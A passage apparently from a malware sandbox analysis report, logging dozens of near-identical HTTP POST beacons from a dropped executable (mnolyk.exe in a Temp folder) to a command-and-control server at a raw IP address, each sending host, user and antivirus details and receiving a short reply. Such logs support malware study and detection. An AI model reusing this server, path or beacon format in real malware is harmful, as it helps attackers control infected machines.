                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.683015108 CET324INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        123192.168.2.54981362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:20.872292042 CET324OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.936855078 CET325INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        124192.168.2.54981462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:21.151913881 CET325OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.216082096 CET326INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        125192.168.2.54981562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:21.391572952 CET326OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.455930948 CET327INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        126192.168.2.54981662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:21.645116091 CET327OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.707312107 CET328INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        127192.168.2.54981762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:21.886399984 CET328OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.951565027 CET329INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        128192.168.2.54981862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:22.140346050 CET329OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.207415104 CET330INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        129192.168.2.54981962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:22.395200968 CET330OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.459952116 CET331INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13192.168.2.54970362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:31.801911116 CET213OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.868216991 CET214INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        130192.168.2.54982062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:22.659075975 CET331OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.724231958 CET332INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        131192.168.2.54982162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:22.892786026 CET332OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.957637072 CET333INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        132192.168.2.54982262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:23.172086954 CET333OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.237900972 CET334INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        133192.168.2.54982362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:23.433454037 CET334OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.496156931 CET335INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        134192.168.2.54982462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:23.678412914 CET335OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.740700006 CET336INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        135192.168.2.54982562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:23.920192003 CET336OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.984153032 CET337INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        136192.168.2.54982662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:24.159354925 CET337OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.226125956 CET338INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        137192.168.2.54982762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:24.402563095 CET338OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.465754986 CET339INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        138192.168.2.54982862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:24.646924973 CET339OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.711596966 CET340INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        139192.168.2.54982962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:24.880676985 CET340OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.943907022 CET341INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        14192.168.2.54970462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:32.045624018 CET214OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.117239952 CET215INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        140192.168.2.54983062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:25.114846945 CET341OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
